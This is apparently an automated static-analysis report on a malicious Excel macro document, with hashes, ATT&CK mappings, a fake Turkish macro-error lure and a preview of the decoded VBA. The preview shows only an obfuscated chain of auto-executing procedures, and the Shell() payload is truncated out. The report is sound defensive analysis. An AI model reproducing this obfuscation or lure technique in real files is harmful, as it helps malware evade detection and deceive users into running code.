Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8abcb3084bb72c1c…

MALICIOUS

Office (OLE)

Size: 132.0 KB
Created: 2017-08-23 04:46:09
Authoring application: Microsoft Excel
First seen: 2018-09-04
MD5: fe0717b3bb396e0ed48725178eaa0d5e
SHA-1: 47dcf95d8377d714127b364e40291b937fe27f3b
SHA-256: 8abcb3084bb72c1cb49aebaf0a0c221a40538a062a1b8830c1b48d913211a403
Risk Score: 228

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is an Excel file containing a Workbook_Open VBA macro that uses the Shell() function, indicating an attempt to execute arbitrary code on document open. The document body displays a fake "Microsoft Office Macro Error" message in Turkish that prompts the user to enable macros, a common social engineering tactic. The combination of the Shell() call and Workbook_Open auto-execution strongly suggests the macro is designed to download and execute a second-stage payload.

Heuristics (6)

  • ClamAV: Xls.Malware.Valyria-10036514-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Workbook_Open macro (high, OLE_VBA_WBOPEN)
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
    Environ() call (env variable access)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 35868 bytes
SHA-256: bd9d7f0f71ec0c5bfa2d0efbded1b9c964c4453b9beeb3d0983e0ee9878df23a

Preview script (first 1,000 lines of the extracted script). The visible portion consists of a long chain of procedures that each do nothing but call the next (worKbook_oPen calls VsPCK, which calls OIGnB, and so on); the Shell() and Environ() calls flagged by the heuristics lie beyond the truncated part of the preview.
Attribute VB_Name = "Kurban2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Kurban1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub worKbook_oPen(): Call VsPCK: End Sub
Static Sub VsPCK()
Call OIGnB
End Sub
Static Function OIGnB() As Integer
Call tEoIO
End Function
Sub tEoIO()
Call YzWdb
End Sub
Function YzWdb()
Call DvDyo
End Function
Static Sub DvDyo()
Call wLuje
End Sub
Static Function wLuje() As Date
Call bGcEr
End Function
Static Sub bGcEr()
Call GCKZE
End Sub
Static Function GCKZE() As Boolean
Call lxstR
End Function
Sub lxstR()
Call QtZOe
End Sub
Sub QtZOe()
Call JJQzV
End Sub
Static Sub JJQzV()
Call oEyUi
End Sub
Static Function oEyUi() As Long
Call UAgpv
End Function
Static Sub UAgpv()
Call zvNKI
End Sub
Static Sub zvNKI()
Call sMEvz
End Sub
Static Function sMEvz() As String
Call XHmQM
End Function
Sub XHmQM()
Call rOvhK
End Sub
Private Function rOvhK() As Boolean
Call WJcCX
End Function
Static Function WJcCX() As Currency
Call BFKXk
End Function
Sub BFKXk()
Call uVBIb
End Sub
Sub uVBIb()
Call ZRjdo
End Sub
Function ZRjdo() As Double
Call FMQyB
End Function
Sub FMQyB()
Call kHyTO
End Sub
Function kHyTO() As Long
Call dYpEF
End Function
Static Sub dYpEF()
Call ITXYS
End Sub
Function ITXYS() As Integer
Call nPFtf
End Function
Sub nPFtf()
Call SKmOs
End Sub
Function SKmOs()
Call xFUjF
End Function
Sub xFUjF()
Call qWLUw
End Sub
Function qWLUw() As Object
Call VRtpJ
End Function
Private Sub VRtpJ()
Call ANaKV
End Sub
Function ANaKV() As Boolean
Call fIIei
End Function
Sub fIIei()
Call KDqzv
End Sub
Function KDqzv() As Byte
Call DUhkm
End Function
Function DUhkm() As Byte
Call iPPFz
End Function
Sub iPPFz()
Call NLwaM
End Sub
Function NLwaM() As Currency
Call tGevZ
End Function
Static Function tGevZ() As String
Call lWVgQ
End Function
Function lWVgQ() As String
Call RSDBd
End Function
Sub RSDBd()
Call wNkVq
End Sub
Function wNkVq() As Variant
Call bJSqD
End Function
Sub bJSqD()
Call GEALQ
End Sub
Function GEALQ() As Integer
Call zUrwH
End Function
Static Sub zUrwH()
Call eQZRU
End Sub
Function eQZRU() As Single
Call JLGmh
End Function
Sub JLGmh()
Call oHoHu
End Sub
Function oHoHu() As Single
Call hXfsk
End Function
Sub hXfsk()
Call MTNNx
End Sub
Function MTNNx() As Date
Call dRhcP
End Function
Sub dRhcP()
Call tzWTk
End Sub
Private Sub tzWTk()
Call XDVbi
End Sub
Private Sub XDVbi()
Call BGTig
End Sub
Private Function BGTig() As Date
Call eJRqe
End Function
Static Function eJRqe() As Date
Call urGhy
End Function
Static Sub urGhy()
Call YvEox
End Sub
Static Sub YvEox()
Call odtfR
End Sub
Sub odtfR()
Call SgsnP
End Sub
Sub SgsnP()
Call wkquN
End Sub
Sub wkquN()
Call anoBL
End Sub
Sub anoBL()
Call DqmJK
End Sub
Function DqmJK() As Integer
Call htkQI
End Function
Function htkQI() As Long
Call LxiYG
End Function
Function LxiYG() As Currency
Call bfYPa
End Function
Function bfYPa() As Boolean
Call FiWWY
End Function
Function FiWWY() As Object
Call imUeW
End Function
Function imUeW() As Integer
Call MpSlV
End Function
Sub MpSlV()
Call qsQtT
End Sub
Sub qsQtT()
Call UvOAR
End Sub
Sub UvOAR()
Call keDrl
End Sub
Sub keDrl()
Call OhCyj
End Sub
Sub OhCyj()
Call rkAGi
End Sub
Sub rkAGi()
Call VnyNg
End Sub
Function VnyNg() As Double
Call zrwVe
End Function
Function zrwVe() As Byte
Call duucc
End Function
Function duucc() As Single
Call tcjTw
End Function
Function tcjTw()
Call Wgibv
End Function
Function Wgibv() As Variant
... (truncated)